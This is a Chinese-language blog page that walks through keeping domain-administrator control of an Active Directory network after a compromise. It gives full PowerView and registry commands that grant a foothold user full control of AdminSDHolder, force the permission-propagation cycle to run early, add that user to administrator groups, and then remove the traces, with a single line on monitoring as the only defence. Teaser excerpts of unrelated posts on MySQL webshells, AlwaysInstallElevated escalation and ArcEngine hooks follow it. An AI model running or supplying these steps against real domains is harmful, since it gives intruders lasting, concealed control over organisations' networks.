利用AdminSDHolder進行許可權維持

2021-10-12 17:35:34 字數 2423 閱讀 2350

adminsdholder可以理解成是域內很多個組的集合體,如果乙個使用者能完全控制adminsdholder,那麼它就能同時控制域內的許多組,adminsdholder內部的組如下:

administrators

domain admins

account operators

backup operators

domain controllers

enterprise admins

print operators

replicator

read-only domain controllers

schema admins

server operators

假設有這麼一種情況,我們先獲得了域內zhangsan使用者的許可權,然後得到了域控的許可權,現在需要對域控的許可權進行許可權維持。

首先匯入powerview

1.在域控上執行如下命令,使得zhangsan可以對adminsdholder完全控制。

add-domainobjectacl -targetidentity adminsdholder -principalidentity zhangsan -rights all
2.驗證配置結果

get-domainobjectacl adminsdholder | ? | select objectdn,activedirectoryrights |sort -unique
match後面的sid為zhangsan的sid,倘若結果如下圖,則zhangsan已經對adminsdholder有了完全控制許可權。

也可以通過圖形戶頁面來驗證,在域控上執行視窗中輸入adsiedit.msc:

3.由於配置完成後90分鐘才能更新設定,我們可以通過更改登錄檔的方式設定成60秒後觸發,實戰中建議不要改:

reg add hklm\system\currentcontrolset\services\ntds\parameters /v adminsdprotectfrequency /t reg_dword /d 1 /f
4.登陸到zhangsan的賬戶上利用後門

登陸到zhangsan的賬戶上後,可以直接將zhangsan加入到管理員組

5.將觸發時間恢復到120

reg add hklm\system\currentcontrolset\services\ntds\parameters /v adminsdprotectfrequency /t reg_dword /d 120 /f
6.將zhangsan 對於adminsdholder的許可權取消:

remove-domainobjectacl -targetsearchbase "ldap://cn=adminsdholder,cn=system,dc=test,dc=com" -principalidentity zhangsan -rights all -verbose
7.驗證刪除結果

若無回顯,則許可權去除成功。

get-domainobjectacl adminsdholder | ? | select objectdn,activedirectoryrights |sort -unique
1.實時監控adminsdholder的許可權更改情況。

域滲透——adminsdholder

mysql 利用 mysql利用

mysql 寫入webshell復現 1.直接寫入 windows成功率較高 1.檢視是否允許可寫 空可寫,null不行,5.5以前預設為空,5.5以後預設為null 2.寫入檔案 2.日誌檔案寫入shell 5.0以後會建立日誌檔案 資料庫許可權 1.檢視是否開啟日誌 2.開啟日誌 3.設定路徑 ...

利用AlwaysInstallElevated提權

2.啟用alwaysinstallelevated 3.提權 4.防禦方式 5.參考文章 alwaysinstallelevated是登錄檔的乙個鍵值,當其值為1的時候,普通使用者即可以system許可權安裝msi程式。certutil.exe urlcache split f開啟powershel...

鉤子的利用

在 ae 開發中,可以利用鉤子把 mapcontrol 給傳到由 itool 或者icommond 繼承的命令或者工具裡,傳進去的鉤子就是 hook 型別是乙個 object 實際上就是乙個 mapcontrol 可以用強制轉換為 mapcontrol icommand gtcstandard if...